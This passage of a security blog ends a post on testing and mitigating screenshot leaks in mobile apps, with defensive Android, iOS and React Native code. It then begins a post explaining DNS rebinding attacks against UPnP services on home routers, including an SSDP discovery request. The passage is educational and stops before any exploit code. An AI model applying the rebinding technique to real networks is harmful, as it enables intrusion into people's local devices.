of the application, and that it is effective against both user and system
generated screenshots.</div><div><br /></div><h3 style="text-align: left;">iOS</h3>
<div>
Since on <i><u>iOS</u></i> it is <i><u>not possible to prevent user generated screenshots</u></i>, we have
to search for code that uses the notification system to make the application
aware that a screenshot has been taken.
</div>
<div>It is then possible to search for the following keywords:</div>
<div>
<ul style="text-align: left;">
<li>
<span style="font-family: courier;">userDidTakeScreenshotNotification</span>
(Swift)
</li>
<li>
<span style="font-family: courier;">UIApplicationUserDidTakeScreenshotNotification</span>
(Objective-C)
</li>
</ul>
<div>
If either of these keywords is found, it should be possible to observe a
callback being executed after a user generated screenshot has been taken.
</div>
</div>
<div><br /></div>
<div>
On the other hand, for system generated screenshots, it is necessary to
analyze the pieces of code responsible for handling the transitions between
the foreground and background application states.
</div>
<div>
Since system generated screenshots are taken just before the application is
put in the background, if any remediation has been implemented we expect to
find, in these portions of code, some mechanism that hides or obfuscates the
sensitive parts of the UI just before the screenshot is taken.
</div>
<div>
<div>It would then be possible to search for the possible values:</div>
<div>
<ul style="text-align: left;">
<li>
<span style="font-family: courier;">applicationWillResignActive</span>
(here we should find pieces of code hiding parts of the UI, e.g. by
setting the <span style="font-family: courier;">hidden</span> property
on a view)
</li>
<li>
<span style="font-family: courier;">applicationDidBecomeActive</span>
(here we should find pieces of code showing parts of the UI, e.g. by
unsetting the <span style="font-family: courier;">hidden</span> property
on a view)
</li>
</ul>
</div>
<div><br /></div>
</div>
<h4 style="text-align: left;">Dynamic Analysis</h4>
<div>
TLDR; Let's try to generate a screenshot of the application and let's check if
the application UI is shown in the device task manager.
</div>
<div><br /></div>
<h3 style="text-align: left;">User Generated Screenshots</h3>
<div>
First of all, let's focus on how we can generate a screenshot of our running
application. Basically it will depend on which OS and device type we are
testing.
</div>
<div><br /></div>
<div>
On a variety of Android devices, it is possible to generate a screenshot by
using device specific combo keys. The most common combinations are:
</div>
<div>
<ul style="text-align: left;">
<li>VOLUME DOWN + POWER</li>
<li>VOLUME UP + POWER</li>
</ul>
<div>
It is also possible to generate a screenshot by using the dedicated
tile in the system tray, but this strongly depends on the OS customizations.
</div>
</div>
<div><br /></div>
<div>
If we are using the Android emulator, we can use the specific button on the
emulator toolbar:
</div>
<div><br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnGhYA-5UuE1z3H8-p3YRGVQdTjPRY-COdHDABS2e617Hp4aA5OLt1oUr4kEBjPeJGYZ13AEjFtkEbPxH0bKYzGbRnAu_5D_UX_LErS7mgzomrz45fBE7g60AxWIjhKSJFUDObFlNDMO4/s63/android_emu1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="45" data-original-width="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnGhYA-5UuE1z3H8-p3YRGVQdTjPRY-COdHDABS2e617Hp4aA5OLt1oUr4kEBjPeJGYZ13AEjFtkEbPxH0bKYzGbRnAu_5D_UX_LErS7mgzomrz45fBE7g60AxWIjhKSJFUDObFlNDMO4/s0/android_emu1.png" /></a>
</div>
<div class="separator" style="clear: both; text-align: center;"><br /></div>
</div>
<div>
On iOS it depends on which physical keys are available on the target device.
The two possible combo keys are:
</div>
<div>
<ul style="text-align: left;">
<li>POWER + HOME</li>
<li>VOLUME UP + POWER</li>
</ul>
<div>
Finally, if we are using the iOS simulator, we can use the combo key
<span style="font-family: courier;">CMD + S</span> or we can use the drop
down menu entry under
<span style="font-family: courier;">File -> New Screen Shot</span>.
</div>
</div>
<div><br /></div>
<div>
In all the above cases, the test is positive (i.e. the weakness is confirmed)
if a screenshot is successfully generated containing exactly the views shown on
the device's screen, without any kind of modification and without any kind of
notification generated on the device.
</div>
<div><br /></div>
<div>
If the running application is properly secured, we will see the following
notification being generated on Android:
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6p8-NUrd_Jb45zVMg1-brf4LRYvqkKYLO8N1UWwBiSGxVvt0KmBstFaDHyDrORHRBGB9kzglqH6BjTdb1Hf9wkhxgmcYBnuhj7Obqm_b1v5kwstZ1hdcgQoV1WVPasOyuFeg_LNNrYgE/s655/android_notification1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="177" data-original-width="655" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6p8-NUrd_Jb45zVMg1-brf4LRYvqkKYLO8N1UWwBiSGxVvt0KmBstFaDHyDrORHRBGB9kzglqH6BjTdb1Hf9wkhxgmcYBnuhj7Obqm_b1v5kwstZ1hdcgQoV1WVPasOyuFeg_LNNrYgE/s320/android_notification1.png" width="320" /></a>
</div>
<div><br /></div>
<div>
On the other hand, since on iOS it is not possible to prevent a user from
taking a screenshot of the application, if the running app implements a
mitigation against screenshot generation it is not possible to define in
advance which behavior a pentester would observe.
</div>
<div>Some possible mitigations are:</div>
<div>
<ul style="text-align: left;">
<li>The screenshot is partially obfuscated</li>
<li>A notification warns the user about the just generated screenshot</li>
<li>
The application shows a message which informs the user about the just
generated screenshot
</li>
</ul>
<div>
Beware that a transparent, invisible mechanism could also be implemented
on iOS to warn the user about the screenshot generation, so dynamic
analysis may not be sufficient to fully understand whether an app
implements some mitigation mechanism.
</div>
<div><br /></div>
</div>
<div><h3 style="text-align: left;">System Generated Screenshots (AKA Task Manager Screenshots)</h3></div>
<div>
On both the operating systems, the test is the same and is pretty
straightforward:
</div>
<div>
<ul style="text-align: left;">
<li>Open the target application</li>
<li>Send the application in background by pressing the HOME button</li>
<li>
Open the system task manager (e.g. by tapping the dedicated button on
Android or by double tapping the home button on iOS, etc)
</li>
</ul>
<div>
At this point, if the application screenshot shown is identical to what
could be observed when the app was in the foreground, no prevention
mechanism is implemented.
</div>
</div>
<div>
On the other hand, if a blank screen is shown, or if the image is partially
obfuscated, the app is implementing some sort of full or partial prevention
mechanism against system generated screenshots.
</div>
<div><br /></div>
<div>
<div><h2>Fixing Screenshot Issues</h2></div><div><br /></div>
</div>
<div style="text-align: left;">
Which APIs are provided to prevent or mitigate the issue?
</div>
<h4 style="text-align: left;"><br /></h4><h3 style="text-align: left;">Android</h3>
<div>One flag to rule them all.</div>
<div>
Android offers the LayoutParams flag
<span style="font-family: courier;">FLAG_SECURE </span><span style="font-family: inherit;"><a href="https://developer.android.com/reference/android/view/WindowManager.LayoutParams#FLAG_SECURE" target="_blank">[3]</a></span>, which prevents
both user and system generated screenshots.</div><div><br /></div><div>Simple and straightforward.<br />
</div>
<div><br /></div>
<h3 style="text-align: left;">iOS</h3>
<div>
On iOS the developer is not provided the ability to prevent user generated
screenshots. This is due to the strict UI/UX guidelines provided by Apple
which are preventing developers from interfering with the standard OS
behavior.
</div>
<div>
Two kinds of APIs are interesting from the security point of view, when
talking about screenshot prevention mechanisms.
</div>
<div><br /></div>
<div>
For <b>user generated</b> screenshots it is possible to use the <span style="font-family: courier;">userDidTakeScreenshotNotification </span><span style="font-family: inherit;"><a href="https://developer.apple.com/documentation/uikit/uiapplication/1622966-userdidtakescreenshotnotificatio" target="_blank">[4]</a></span><span style="font-family: courier;"> </span><span style="font-family: inherit;">system wide notification. In this way, it would be possible to run code
just after a screenshot was generated. </span>
</div>
<div>
<span style="font-family: inherit;">The most common approach is to generate a notification or an alert which
warns the user about the generated screenshot. This informs the user
and raises a red flag in case the screenshot was not explicitly and
voluntarily taken.</span>
</div>
<div><br /></div>
<div>
On the other hand, for <b>system generated</b> screenshots, it is possible to
rely on the <span style="font-family: courier;">applicationWillResignActive </span><span style="font-family: inherit;"><a href="https://developer.apple.com/documentation/uikit/uiapplicationdelegate/1622950-applicationwillresignactive" target="_blank">[5]</a></span><span style="font-family: courier;"> </span><span style="font-family: inherit;">application lifecycle callback. This callback is invoked just before the
application is moved from the foreground to the background and enables
developers to execute code just before the system generated screenshot is
created.</span>
</div>
<div>
<span style="font-family: inherit;">These operations can include:</span>
</div>
<div>
<ul style="text-align: left;">
<li>
<span style="font-family: inherit;">Putting an overlay over the whole application window</span>
</li>
<li>
<span style="font-family: inherit;">Hiding/masking sensitive parts of the UI</span>
</li>
<li>
Navigating to other application parts which are not showing sensitive
information
</li>
</ul><div><br /></div>
<h2 style="text-align: left;">Stop talking! Show me the code!</h2></div><div>This section is intentionally left without any comment, since explanations
have been provided in the above sections.</div>
<div>
Just the source code that can be used in various scenarios and situations.
</div>
<div>
Pro tip: If some data is VERY sensitive, such as the combination of a credit
card PAN, its PIN code and the CVV2 code, don't put it in your views. If some
data is not displayed on the screen, it can't be screenshotted!
</div>
<div><br /></div>
<div>
But since in the real world such an approach is very often not applicable, let's
dig into some mitigation implementations.
</div>
<div><br /></div>
<h4 style="text-align: left;">Android</h4>
<div>Protects from:</div>
<div>
<ul style="text-align: left;">
<li>User generated screenshots: ✔️</li>
<li>System Generated screenshots: ✔️</li>
</ul><div><br /></div>
<h3 style="text-align: left;"><b>Kotlin</b></h3>
</div><blockquote><pre>import android.os.Bundle
import android.support.v7.app.AppCompatActivity
import android.view.WindowManager

class MainActivity : AppCompatActivity() {
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_main)
        // Mark the window as secure: its content is excluded from
        // screenshots and from the task manager preview
        window.setFlags(
            WindowManager.LayoutParams.FLAG_SECURE,
            WindowManager.LayoutParams.FLAG_SECURE
        )
    }
}</pre></blockquote><div><br /></div>
<div><br /></div>
<h3 style="text-align: left;"><b>Java</b></h3>
<div><br /></div>
<div>
<div></div><blockquote><pre>import android.app.Activity;
import android.os.Bundle;
import android.view.WindowManager;

public class MainActivity extends Activity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        // Mark the window as secure: its content is excluded from
        // screenshots and from the task manager preview
        getWindow().setFlags(
            WindowManager.LayoutParams.FLAG_SECURE,
            WindowManager.LayoutParams.FLAG_SECURE
        );
    }
}</pre></blockquote><div></div>
</div>
<div><br /></div>
<div><br /></div>
<div>References: <a href="https://medium.com/nomtek/screenshot-preventing-on-mobile-apps-9e62f51643e9" target="_blank">[6]</a></div><div><br /></div>
<h4 style="text-align: left;">iOS</h4>
<div>
<div>Protects from:</div>
<div>
<ul>
<li>
User generated screenshots: 🤷 (partial)
</li>
<li>System Generated screenshots: ❌</li>
</ul><div><br /></div>
<h3 style="text-align: left;"><b>Swift</b></h3></div></div>
<div>
<div></div><blockquote><pre>import UIKit

// iOS only notifies the app after the screenshot has been taken, so the
// event can be detected and reacted to, not prevented
NotificationCenter.default.addObserver(
    forName: UIApplication.userDidTakeScreenshotNotification,
    object: nil,
    queue: .main) { notification in
        // Notify the user, log the action, etc...
}</pre></blockquote><div></div>
</div>
<div><br /></div>
<h3 style="text-align: left;"><b>Objective-C</b></h3>
<div>
<div></div><blockquote><pre>#import &lt;UIKit/UIKit.h&gt;

// Same observer as the Swift version: fired after the screenshot is taken
NSOperationQueue *mainQueue = [NSOperationQueue mainQueue];
[[NSNotificationCenter defaultCenter]
    addObserverForName:UIApplicationUserDidTakeScreenshotNotification
                object:nil
                 queue:mainQueue
            usingBlock:^(NSNotification *note) {
                // Notify the user, log the action, etc...
            }];</pre></blockquote><div></div>
</div>
<div><br /></div>
<div><div>References: <a href="https://medium.com/nomtek/screenshot-preventing-on-mobile-apps-9e62f51643e9" target="_blank">[6]</a> <a href="https://stackoverflow.com/questions/13484516/ios-detection-of-screenshot" target="_blank">[7]</a></div></div>
<div><br /></div>
<div><br /></div>
<div>
<div>Protects from:</div>
<div>
<ul>
<li>User generated screenshots: ❌</li>
<li>System Generated screenshots: ✔️</li>
</ul>
<div>
<div><br /></div>
<div>
<div></div><blockquote><pre>// UIApplicationDelegate methods: hide the key window while the app is
// inactive, so the snapshot iOS takes for the app switcher shows no content
- (void)applicationWillResignActive:(UIApplication *)application {
    // hide main window
    self.window.hidden = YES;
}

- (void)applicationDidBecomeActive:(UIApplication *)application {
    // show window back
    self.window.hidden = NO;
}</pre></blockquote><div></div>
</div>
<div><br /></div>
</div>
</div>
</div>
<div>References: <a href="http://pinkstone.co.uk/how-to-control-the-preview-screenshot-in-the-ios-multitasking-switcher/" target="_blank">[8]</a></div><div><br /></div>
<h4 style="text-align: left;">React Native</h4>
<div>
<div>Protects from:</div>
<div>
<ul>
<li>Android User generated screenshots: ✔️</li>
<li>Android System Generated screenshots: ✔️</li>
<li>
iOS User generated screenshots: 🤷 (partial)
</li>
<li>iOS System Generated screenshots: ❌</li>
</ul><div><br /></div>
</div>
</div>
<h3 style="text-align: left;"><b>Android</b></h3>
<div>
<div></div><blockquote><div></div><blockquote><pre>import android.os.Bundle;
import android.view.WindowManager;
import com.facebook.react.ReactActivity;

public class MainActivity extends ReactActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        // ReactActivity is still an Android Activity, so the same FLAG_SECURE
        // used in the native Android section applies here
        getWindow().setFlags(
                WindowManager.LayoutParams.FLAG_SECURE,
                WindowManager.LayoutParams.FLAG_SECURE
        );
    }
}</pre></blockquote><div></div></blockquote><div></div>
</div>
<div><br /></div>
<div><br /></div>
<h3 style="text-align: left;"><b>iOS</b></h3>
<div>
<div></div><blockquote><div></div><blockquote><pre>import React from 'react'
import { AppState, Platform, View } from 'react-native'

// Blank view rendered instead of the real UI while the app is not active,
// so the snapshot taken for the app switcher contains nothing sensitive
const SecurityScreen = () => &lt;View /&gt;

const showSecurityScreenFromAppState = appState =>
  ['background', 'inactive'].includes(appState)

const withSecurityScreenIOS = Wrapped => {
  return class WithSecurityScreen extends React.Component {
    state = {
      showSecurityScreen:
        showSecurityScreenFromAppState(AppState.currentState)
    }

    componentDidMount () {
      AppState.addEventListener('change', this.onChangeAppState)
    }

    componentWillUnmount () {
      AppState.removeEventListener('change', this.onChangeAppState)
    }

    onChangeAppState = nextAppState => {
      const showSecurityScreen =
        showSecurityScreenFromAppState(nextAppState)

      this.setState({ showSecurityScreen })
    }

    render() {
      return this.state.showSecurityScreen
        ? &lt;SecurityScreen /&gt;
        : &lt;Wrapped {...this.props} /&gt;
    }
  }
}

// Android is covered by FLAG_SECURE in MainActivity, so no wrapper is needed
const withSecurityScreenAndroid = Wrapped => Wrapped

export const withSecurityScreen = Platform.OS === 'ios'
  ? withSecurityScreenIOS
  : withSecurityScreenAndroid</pre></blockquote><div></div></blockquote><div></div>
</div>
<div><br /></div>
<div><br /></div>
<div>Then, in your App component:</div>
<div><br /></div>
<div>
<div></div><blockquote><pre>import { withSecurityScreen } from './withSecurityScreen'
...
export default withSecurityScreen(App);</pre></blockquote><div></div>
</div>
<div><br /></div>
<div><br /></div>
<div>Pre-bundled libraries are also available on NPM <a href="https://www.npmjs.com/package/react-native-obscure" target="_blank">[10]</a>.</div>
<div><br /></div>
<div>References: <a href="https://medium.com/@jonaskuiler/creating-a-security-screen-on-ios-and-android-in-react-native-97703092e2de" target="_blank">[9]</a> <a href="https://www.npmjs.com/package/react-native-obscure" target="_blank">[10]</a></div><div><br /></div>
<h4 style="text-align: left;">Cordova / Ionic</h4>
<div>
There are many Cordova plugins which can help achieve this goal.
</div>
<div>
A good place to start is the
<b>cordova-plugin-prevent-screenshot-coffice</b> open source repository.
</div>
<div><br /></div>
<div>
<div>Protects from:</div>
<div>
<ul>
<li>Android User generated screenshots: ✔️</li>
<li>Android System Generated screenshots: ✔️</li>
<li>
iOS User generated screenshots: 🤷 (partial)
</li>
<li>iOS System Generated screenshots: ❌</li>
</ul>
<div>References: <a href="https://github.com/flotrugliocoffice/cordova-plugin-prevent-screenshot-coffice">[11]</a></div>
</div>
</div>
<div><br /></div>
<h4 style="text-align: left;">Commercial Solutions</h4>
<div>Several commercial solutions are available on the market; however, since there was no easy way to test any of them, this blog post will not promote or endorse
any commercial tool.
</div>
<div><br /></div>
<h2 style="text-align: left;">Conclusions - Wrapping it up</h2><div>TL;DR: none of the proposed solutions provides full protection against screenshotting, so all of them should be considered mitigations.</div><div><br /></div>
<div>
Since each OS handles application state transitions differently, and
different versions of the same OS also behave differently, it will always be
possible to find some sort of bypass for any implemented mitigation
mechanism.
</div>
<div>
Moreover, if an application is running on an untrusted (jailbroken or rooted) device, an
attacker can hook and bypass any kind of protection with some effort.</div>
<div><br /></div><div>
The chosen mitigation should therefore depend on which data the application
shows on screen and on how sensitive that data is.
</div>
<div>
Examples of such mitigation bypasses are available in the literature, such as <a href="https://medium.com/@techhelpkb/bypass-an-android-apps-screenshot-restriction-34ee4b79b284" target="_blank">[12]</a>.
</div><div><br /></div>
<h2 style="text-align: left;">References</h2>
<div>
<div>[1] - <a href="https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06d-testing-data-storage#testing-auto-generated-screenshots-for-sensitive-information-mstg-storage-9">https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06d-testing-data-storage#testing-auto-generated-screenshots-for-sensitive-information-mstg-storage-9</a></div>
<div>[2] - <a href="https://mobile-security.gitbook.io/mobile-security-testing-guide/android-testing-guide/0x05d-testing-data-storage#finding-sensitive-information-in-auto-generated-screenshots-mstg-storage-9">https://mobile-security.gitbook.io/mobile-security-testing-guide/android-testing-guide/0x05d-testing-data-storage#finding-sensitive-information-in-auto-generated-screenshots-mstg-storage-9</a></div>
<div>[3] - <a href="https://developer.android.com/reference/android/view/WindowManager.LayoutParams#FLAG_SECURE">https://developer.android.com/reference/android/view/WindowManager.LayoutParams#FLAG_SECURE</a></div>
<div>[4] - <a href="https://developer.apple.com/documentation/uikit/uiapplication/1622966-userdidtakescreenshotnotificatio">https://developer.apple.com/documentation/uikit/uiapplication/1622966-userdidtakescreenshotnotificatio</a></div>
<div>[5] - <a href="https://developer.apple.com/documentation/uikit/uiapplicationdelegate/1622950-applicationwillresignactive">https://developer.apple.com/documentation/uikit/uiapplicationdelegate/1622950-applicationwillresignactive</a></div>
<div>[6] - <a href="https://medium.com/nomtek/screenshot-preventing-on-mobile-apps-9e62f51643e9">https://medium.com/nomtek/screenshot-preventing-on-mobile-apps-9e62f51643e9</a></div>
<div>[7] - <a href="https://stackoverflow.com/questions/13484516/ios-detection-of-screenshot">https://stackoverflow.com/questions/13484516/ios-detection-of-screenshot</a></div>
<div>[8] - <a href="http://pinkstone.co.uk/how-to-control-the-preview-screenshot-in-the-ios-multitasking-switcher/">http://pinkstone.co.uk/how-to-control-the-preview-screenshot-in-the-ios-multitasking-switcher/</a></div>
<div>[9] - <a href="https://medium.com/@jonaskuiler/creating-a-security-screen-on-ios-and-android-in-react-native-97703092e2de">https://medium.com/@jonaskuiler/creating-a-security-screen-on-ios-and-android-in-react-native-97703092e2de</a></div>
<div>[10] - <a href="https://www.npmjs.com/package/react-native-obscure">https://www.npmjs.com/package/react-native-obscure</a></div>
<div>[11] - <a href="https://github.com/flotrugliocoffice/cordova-plugin-prevent-screenshot-coffice">https://github.com/flotrugliocoffice/cordova-plugin-prevent-screenshot-coffice</a></div>
<div>[12] - <a href="https://medium.com/@techhelpkb/bypass-an-android-apps-screenshot-restriction-34ee4b79b284">https://medium.com/@techhelpkb/bypass-an-android-apps-screenshot-restriction-34ee4b79b284</a></div>
<div><br /></div>
</div>
<div><br /></div>
Martino Lessiohttp://www.blogger.com/profile/15529162337412441148noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-62963135666435357752021-02-26T02:17:00.012-08:002021-02-26T02:21:01.714-08:00A Journey Into the Beauty of DNSRebinding - Part 1<h3><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1lSZSDJJEuehJnUEe5dQ1Io-DqJs6ZP9mz4OkKORszTHKr-3hQJHz5eOhQ2MROJ2C5wFSBbBRlYv2dYIGL5AJ3Ery59-lFG10caA0LFusokKrRVEqPKKoI6udPReEJduoGiwlWb61wpRh/s253/DNS_2.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="225" data-original-width="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1lSZSDJJEuehJnUEe5dQ1Io-DqJs6ZP9mz4OkKORszTHKr-3hQJHz5eOhQ2MROJ2C5wFSBbBRlYv2dYIGL5AJ3Ery59-lFG10caA0LFusokKrRVEqPKKoI6udPReEJduoGiwlWb61wpRh/s0/DNS_2.jpg" /></a></div><br />Authors</h3><p style="text-align: left;">Giovanni Guido<br />Alessandro Braccio</p><p></p><h3 style="text-align: left;">Abstract</h3><p style="text-align: justify;">In this first blog post on the <i>DNS rebinding</i> topic, we are going to show a practical example of a <b>DNS Rebinding attack against UPnP services</b> exposed in a local network. </p><p style="text-align: justify;">The goal of this post series is to show real attack scenarios against devices exposing services on a local network. </p><div style="text-align: justify;"><p>Such scenarios usually involve <b>interconnected IoT home or smart office devices</b>, which are very interesting from an attacker's perspective.</p></div><h3 style="text-align: justify;">Introduction</h3><p style="text-align: justify;">Nowadays, IoT devices are around us in every environment, starting from our homes, where smart devices interact with each other in order to simplify our daily tasks. 
These devices use a variety of protocols to communicate, from common HTTP requests to Bluetooth Low Energy, but also pretty old protocols that are having a comeback, such as <a href="https://tools.ietf.org/html/rfc6970" target="_blank">UPnP (Universal Plug and Play)</a>.</p><p style="text-align: justify;">The main and most sensitive parts of the services implemented by IoT smart devices are usually not directly exposed to the external network, so an attacker would need to gain a position within the local network in order to exploit them. </p><p style="text-align: justify;">The purpose of this first post is to give an overview of the DNS Rebinding attack technique and to show a practical example involving common UPnP services implemented by typical home devices, such as routers.</p><h3 style="text-align: left;">The DNS Rebinding Attack</h3><div style="text-align: justify;"><div><p>In short, <a href="https://crypto.stanford.edu/dns/" target="_blank">DNS Rebinding</a> is an attack technique that allows an attacker to bypass the <a href="https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy" target="_blank">Same Origin Policy (SOP)</a> by <i>exploiting</i> the <i>DNS cache</i> of the browser itself.</p><p>After a first phase in which the victim is induced to visit a malicious web page, the attacker tricks the victim's browser by using a DNS server under their control. </p><p>This attack is normally used to compromise devices present in a local network in order to use them as relay points, bypassing the local network NAT trust boundary. 
Below is a diagram showing a more detailed example and the related steps:</p></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVv0-6eE5P7JCaDRiRVhyphenhyphen7M9tTyKJhahPdWHo9_gaoORairZ9JSfsT6oznIjYrtsPzoncExOXZVIeYF0sd5RLpCopUUvivHjh0lc7MPZpABpHRLgkFw58ba1cqwd4b6B3a1C9eLGFg5F5n/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="734" data-original-width="891" height="528" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVv0-6eE5P7JCaDRiRVhyphenhyphen7M9tTyKJhahPdWHo9_gaoORairZ9JSfsT6oznIjYrtsPzoncExOXZVIeYF0sd5RLpCopUUvivHjh0lc7MPZpABpHRLgkFw58ba1cqwd4b6B3a1C9eLGFg5F5n/w640-h528/dnsr_diagram_2.png" width="640" /></a></div></div><div style="text-align: left;"><br /></div><div style="text-align: left;"><span style="font-family: inherit;">In particular:</span></div><div style="text-align: left;"><ul style="text-align: left;"><li style="text-align: justify;">The attacker sets up a <i>DNS service</i> for a <i>malicious domain</i>. </li><li style="text-align: justify;">The attacker <i>tricks a victim</i> into accessing the controlled malicious domain. This step could be done using phishing techniques, such as Cross-Site Scripting, Content Manipulation or Social Network and Instant Messaging spam. </li><li style="text-align: justify;">The victim's browser, when visiting the malicious domain, performs a DNS query for that domain. </li><li style="text-align: justify;">The malicious DNS server responds to the query with the actual IP address of the domain. </li></ul><span style="text-align: justify;">Meanwhile, the victim's browser caches the returned IP address. 
</span><br /><ul style="text-align: left;"><li style="text-align: justify;">Since the attacker has configured the <i>DNS Time-To-Live (TTL)</i> at the <b>lowest</b> possible value, when the cache retention time expires the victim's browser makes another DNS request for the same domain, as it needs a <b>new IP address</b>. </li><li style="text-align: justify;">This time, the malicious DNS service responds with a private IP address, such as <b>192.168.1.1</b>, belonging to a device present inside the target private network. </li><li style="text-align: justify;">At this point, in the victim's browser, all origin-based security policies enforced by the Same Origin Policy are potentially bypassed, as the address behind the initial origin has been swapped. Therefore, any JavaScript code previously loaded from the malicious website is now able to access any HTTP resource locally exposed in the LAN by the target device at <b>192.168.1.1</b>.</li></ul></div><p style="text-align: justify;">Now, taking a <i>Smart TV</i> as the subject of a <i>DNS Rebinding attack</i>, which behaviour makes it exposed to such attacks?</p><div style="text-align: left;"><p style="text-align: justify;">The <i>Smart TV</i> web server expects to receive requests with known and trusted values inside the HTTP “<b>Host</b>” header; for instance, a legitimate request should contain “<b>Host: 192.168.1.53</b>”, where “<b>192.168.1.53</b>” is the IP address of the TV itself. A header such as “<b>Host: attacker.mindedsecurity.com</b>” should therefore raise a warning in the application.</p></div><p style="text-align: justify;">So, if the target device does not properly validate the “<b>Host</b>” header and shows the same behaviour with tampered values (i.e. 
the response is the same), <u>this can be considered likely exploitable via DNS Rebinding attacks</u>.</p><p style="text-align: justify;">The following sections describe a practical example of a <u><i>DNS Rebinding attack against a home router</i></u>. </p><p style="text-align: justify;">In this first example, it will be shown how to exploit the <a href="https://tools.ietf.org/id/draft-bpw-pcp-upnp-igd-interworking-01.html" target="_blank">IGD Profile</a> of the UPnP protocol implemented by some routers, in order to perform a <a href="https://www.akamai.com/uk/en/multimedia/documents/white-paper/upnproxy-blackhat-proxies-via-nat-injections-white-paper.pdf" target="_blank">NAT Injection</a> attack. </p><p style="text-align: justify;">However, it should be considered that this is just one of the possible attack scenarios and that the DNS Rebinding attack possibilities are limitless, especially in the IoT era. </p><p></p></div><h3 style="text-align: left;">The UPnP Protocol</h3><div style="text-align: left;"><div style="text-align: justify;"><span id="docs-internal-guid-fe675ce5-7fff-80b5-a326-228397c1209b" style="font-family: inherit;"><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="white-space: pre-wrap;">An interesting example of a local service is <b>UPnP</b>, which is a <a href="https://tools.ietf.org/html/rfc6970" rel="nofollow" target="_blank">pretty old protocol</a> that is coming back from the past thanks to the growth of smart devices.
</span></p><p><span style="white-space: pre-wrap;">UPnP is a protocol designed to support automatic device discovery within a network without any configuration from the user. This way, for instance, a smart TV application can expose a UPnP service on a local network (e.g. a home network) to give the user the ability to control the video player from their smartphone or other devices.</span></p><p></p><p><span style="white-space: pre-wrap;">The UPnP stack builds on different protocols such as TCP, UDP, HTTP and SOAP, and can be summarized in the following layers:</span></p><p></p><ol><li><span style="white-space: pre-wrap;">Discovery</span></li><li><span style="white-space: pre-wrap;">Description</span></li><li><span style="white-space: pre-wrap;">Control</span></li><li><span style="white-space: pre-wrap;">Eventing</span></li><li><span style="white-space: pre-wrap;">Presentation</span></li></ol><span><span style="white-space: pre-wrap;">Some of these layers are briefly described below; for more details, the <a href="http://upnp.org/specs/arch/UPnP-arch-DeviceArchitecture-v2.0.pdf" target="_blank">UPnP Device Architecture</a> specification should be consulted.</span></span></span></div></div><div><h3 style="text-align: left;">Discovering UPnP devices &amp; services inside a local network</h3><p style="text-align: justify;"><span id="docs-internal-guid-3bd62386-7fff-c672-fe32-0767029eac7d"><span style="font-family: inherit; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">When a UPnP "client" (control point) is added to a local network, it starts looking for UPnP devices and services by using SSDP (Simple Service Discovery Protocol): the control point sends an M-SEARCH HTTPU (HTTP over UDP) discovery request to a specific multicast address (239.255.255.250). 
All the listening devices will then reply with a unicast HTTPU response, as shown in the following image.</span></span></p><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdo16IlhDH_W0go1aPBWftN1QJAfwGdY4soFJWi7mltr1-F0wry9zSXtguKTpt3nVrZ2N6wsx3izN6fYPoOsTaX2Bel5AWBNjfki8YoZhfEpHuByuSGq9MAV4a15wrmsxenJPjozwM0VmT/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="634" data-original-width="602" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdo16IlhDH_W0go1aPBWftN1QJAfwGdY4soFJWi7mltr1-F0wry9zSXtguKTpt3nVrZ2N6wsx3izN6fYPoOsTaX2Bel5AWBNjfki8YoZhfEpHuByuSGq9MAV4a15wrmsxenJPjozwM0VmT/w608-h640/ssdp_diagram.png" width="608" /></a></div><p style="text-align: left;">Below is an example of an SSDP request used to discover all the UPnP devices in a network:</p></div><div><pre>M-SEARCH * HTTP/1.1
HOST: 239.255.255.250:1900
MAN: "ssdp:discover"
MX: 1
ST: ssdp:all</pre></div><p style="text-align: left;">Example of an SSDP response from a home router:</p></div><div><pre>HTTP/1.1 200 OK
LOCATION: http://192.168.1.1:41952/RInc4AcPDaf/
EXT:
SERVER: POSIX, UPnP/1.0, Intel MicroStack/1.0.2777
USN: uuid:c6bbfad2-190b-4fcc-b0d9-fd63781a49ce::urn:schemas-upnp-org:service:ContentDirectory:1
CACHE-CONTROL: max-age=1800
ST: urn:schemas-upnp-org:service:ContentDirectory:1</pre></div><div><br /></div><div><div style="text-align: justify;"><span id="docs-internal-guid-14a6bf1c-7fff-0c4c-a1f9-42bf0aef5768"><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: inherit; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">There are a lot of UPnP discovery tools available in the <a href="https://github.com/tenable/upnp_info" target="_blank">wild</a>. 
